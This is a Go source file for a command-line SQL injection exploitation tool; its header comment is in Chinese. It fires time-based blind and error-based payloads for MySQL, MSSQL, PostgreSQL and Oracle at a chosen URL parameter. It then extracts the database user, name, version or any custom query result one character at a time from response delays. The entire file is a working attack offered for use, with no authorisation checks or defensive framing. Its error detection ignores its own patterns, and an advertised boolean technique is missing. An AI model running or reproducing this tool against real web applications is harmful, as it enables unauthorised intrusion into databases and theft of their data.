// sqli-exploit.go - 高性能SQL注入利用工具 package main import ( "flag" "fmt" "io" "net/http" "net/url" "strings" "sync" "time" ) type SQLiExploit struct { Client *http.Client TargetURL string Method string Param string Threads int Timeout time.Duration } type InjectionResult struct { Payload string VulnType string DBMS string ResponseLen int } var ( colorRed = "\033[91m" colorGreen = "\033[92m" colorYellow = "\033[93m" colorBlue = "\033[94m" colorCyan = "\033[96m" colorBold = "\033[1m" colorEnd = "\033[0m" ) func NewSQLiExploit(target, method, param string, threads int, timeout time.Duration) *SQLiExploit { return &SQLiExploit{ Client: &http.Client{ Timeout: timeout, CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse }, }, TargetURL: target, Method: method, Param: param, Threads: threads, Timeout: timeout, } } func (s *SQLiExploit) SendRequest(payload string) (string, int, error) { var req *http.Request var err error targetURL := s.TargetURL if s.Method == "GET" { u, _ := url.Parse(targetURL) q := u.Query() q.Set(s.Param, payload) u.RawQuery = q.Encode() req, err = http.NewRequest("GET", u.String(), nil) } else { data := url.Values{} data.Set(s.Param, payload) req, err = http.NewRequest("POST", targetURL, strings.NewReader(data.Encode())) req.Header.Set("Content-Type", "application/x-www-form-urlencoded") } if err != nil { return "", 0, err } req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36") resp, err := s.Client.Do(req) if err != nil { return "", 0, err } defer resp.Body.Close() body, _ := io.ReadAll(resp.Body) return string(body), len(body), nil } func (s *SQLiExploit) TestTimeBased(payloads []struct { Payload string DBMS string Delay time.Duration }) []InjectionResult { var results []InjectionResult var mu sync.Mutex var wg sync.WaitGroup sem := make(chan struct{}, s.Threads) for _, p := range payloads { wg.Add(1) go func(payload, dbms string, delay time.Duration) { defer wg.Done() sem <- struct{}{} defer func() { <-sem }() start := time.Now() _, respLen, err := s.SendRequest(payload) elapsed := time.Since(start) if err == nil && elapsed >= delay-500*time.Millisecond { mu.Lock() results = append(results, InjectionResult{ Payload: payload, VulnType: "Time-based Blind", DBMS: dbms, ResponseLen: respLen, }) mu.Unlock() fmt.Printf("%s[VULN]%s [Time-based] %s - Delay: %v - DBMS: %s\n", colorRed+colorBold, colorEnd, payload, elapsed, dbms) } }(p.Payload, p.DBMS, p.Delay) } wg.Wait() return results } func (s *SQLiExploit) TestErrorBased(payloads []struct { Payload string Type string }) []InjectionResult { var results []InjectionResult errorPatterns := map[string]string{ "MySQL": "SQL syntax.*MySQL|Warning.*mysql_|MySqlException", "PostgreSQL": "PostgreSQL.*ERROR|Warning.*pg_|pg_query", "MSSQL": "Microsoft SQL Server|ODBC SQL Server|SQLServer", "Oracle": "ORA-\\d{5}|Oracle.*Driver", "SQLite": "SQLite.*error|sqlite3.OperationalError", } for _, p := range payloads { body, respLen, err := s.SendRequest(p.Payload) if err != nil { continue } for dbms, pattern := range errorPatterns { if strings.Contains(body, "SQL") || strings.Contains(body, "error") || strings.Contains(body, "Error") || strings.Contains(body, "Warning") { results = append(results, InjectionResult{ Payload: p.Payload, VulnType: "Error-based", DBMS: dbms, ResponseLen: respLen, }) fmt.Printf("%s[VULN]%s [Error-based] %s - DBMS: %s\n", colorRed+colorBold, colorEnd, p.Payload, dbms) break } } } return results } func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, maxLen int) string { var result strings.Builder charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-@." fmt.Printf("\n%s[*]%s Extracting: %s\n", colorCyan, colorEnd, query) for pos := 1; pos <= maxLen; pos++ { found := false for _, char := range charset { var payload string if technique == "time" { switch dbms { case "mysql": payload = fmt.Sprintf("1' AND IF(SUBSTRING((%s),%d,1)='%c',SLEEP(1),0)-- -", query, pos, char) case "mssql": payload = fmt.Sprintf("1'; IF SUBSTRING((%s),%d,1)='%c' WAITFOR DELAY '0:0:1'-- -", query, pos, char) case "postgresql": payload = fmt.Sprintf("1' AND CASE WHEN SUBSTRING((%s),%d,1)='%c' THEN pg_sleep(1) END-- -", query, pos, char) } start := time.Now() s.SendRequest(payload) elapsed := time.Since(start) if elapsed >= 900*time.Millisecond { result.WriteByte(byte(char)) found = true fmt.Printf("\r%s[+]%s Extracted: %s", colorGreen, colorEnd, result.String()) break } } } if !found { break } } fmt.Println() return result.String() } func main() { target := flag.String("u", "", "Target URL") method := flag.String("m", "GET", "HTTP Method (GET/POST)") param := flag.String("p", "id", "Parameter to inject") threads := flag.Int("t", 5, "Number of threads") timeout := flag.Duration("timeout", 10*time.Second, "Request timeout") technique := flag.String("technique", "time", "Injection technique (time/error/bool)") extract := flag.String("extract", "", "Data to extract (user/database/version)") query := flag.String("query", "", "Custom SQL query") dbms := flag.String("dbms", "mysql", "Database type (mysql/mssql/postgresql)") flag.Parse() if *target == "" { fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd) flag.Usage() return } fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd) fmt.Printf("%sSQL Injection Exploit Tool (Go)%s\n", colorBold, colorEnd) fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd) exploit := NewSQLiExploit(*target, *method, *param, *threads, *timeout) fmt.Printf("%s[INFO]%s Target: %s\n", colorBlue, colorEnd, *target) fmt.Printf("%s[INFO]%s Method: %s\n", colorBlue, colorEnd, *method) fmt.Printf("%s[INFO]%s Parameter: %s\n", colorBlue, colorEnd, *param) fmt.Printf("%s[INFO]%s Technique: %s\n", colorBlue, colorEnd, *technique) timePayloads := []struct { Payload string DBMS string Delay time.Duration }{ {"1' AND SLEEP(1)-- -", "MySQL", 1 * time.Second}, {"1' AND (SELECT SLEEP(1))-- -", "MySQL", 1 * time.Second}, {"1'; WAITFOR DELAY '0:0:1'-- -", "MSSQL", 1 * time.Second}, {"1' AND pg_sleep(1)-- -", "PostgreSQL", 1 * time.Second}, {"1' AND (SELECT dbms_pipe.receive_message('a',1) FROM dual)-- -", "Oracle", 1 * time.Second}, } errorPayloads := []struct { Payload string Type string }{ {"'", "Single Quote"}, {"\"", "Double Quote"}, {"' OR 1=1-- -", "OR Injection"}, {"' AND 1=1-- -", "AND Injection"}, {"' UNION SELECT NULL-- -", "UNION"}, } var allResults []InjectionResult fmt.Printf("\n%s[*]%s Testing Time-based Injection...\n", colorCyan, colorEnd) timeResults := exploit.TestTimeBased(timePayloads) allResults = append(allResults, timeResults...) fmt.Printf("\n%s[*]%s Testing Error-based Injection...\n", colorCyan, colorEnd) errorResults := exploit.TestErrorBased(errorPayloads) allResults = append(allResults, errorResults...) if *extract != "" || *query != "" { var extractQuery string switch *extract { case "user": switch *dbms { case "mysql": extractQuery = "SELECT user()" case "mssql": extractQuery = "SELECT SYSTEM_USER" case "postgresql": extractQuery = "SELECT current_user" } case "database": switch *dbms { case "mysql": extractQuery = "SELECT database()" case "mssql": extractQuery = "SELECT DB_NAME()" case "postgresql": extractQuery = "SELECT current_database()" } case "version": switch *dbms { case "mysql": extractQuery = "SELECT version()" case "mssql": extractQuery = "SELECT @@version" case "postgresql": extractQuery = "SELECT version()" } default: extractQuery = *query } if extractQuery != "" { result := exploit.ExtractData(extractQuery, *technique, *dbms, 100) fmt.Printf("\n%s[+]%s Result: %s\n", colorGreen, colorEnd, result) } } fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd) fmt.Printf("%s[SUMMARY]%s Found %d vulnerabilities\n", colorGreen, colorEnd, len(allResults)) for _, r := range allResults { fmt.Printf(" - [%s] %s - %s\n", r.VulnType, r.DBMS, r.Payload) } fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd) }